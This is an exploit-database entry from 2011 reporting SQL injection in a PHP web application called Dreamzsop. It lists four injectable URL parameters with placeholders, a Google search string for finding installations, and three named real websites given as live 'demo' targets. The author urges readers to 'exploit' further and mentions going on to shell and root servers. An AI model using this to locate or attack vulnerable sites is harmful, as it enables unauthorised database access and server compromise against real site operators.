Dreamzsop SQL Injection Vulnerbility

2011-05-30T00:00:00
ID 1337DAY-ID-16216
Type zdt
Reporter lionaneesh
Modified 2011-05-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: SQL Injection Vulnerbility in Dreamzsop
# Google Dork: intext:"By: Dreamzsop"
# Date: 30/5/2011
# Author: lionaneesh
# Software Link: http://dreamzsop.co.in/
# Risk Level : High
# A hacker can get admin access to web database leading to further
attacks , Shelling and Rooting of server

POC :-

http://[sitename]/[path]/index.php?id=%inject_here%

http://[sitename]/[path]/members_id=%inject_here%

http://[sitename]/[path]/view_list.php?id=%Inject_Here%

http://[sitename]/[path]/articles.php?art_catid=%Inject_Here%


Just play with your imagination , search for more data inputs and
exploit! :D ;D :))


Demo :-

http://www.findfriendz.com/videos/online/index.php?id=%Inject_HERE%790
http://www.cbseguess.com/profiles/?members_id=%Inject_here%17967
http://www.smehelpline.com/listings/view_list.php?id=%Inject_here%3446


--------------------------------------------------------------------------------



#  0day.today [2018-03-02]  #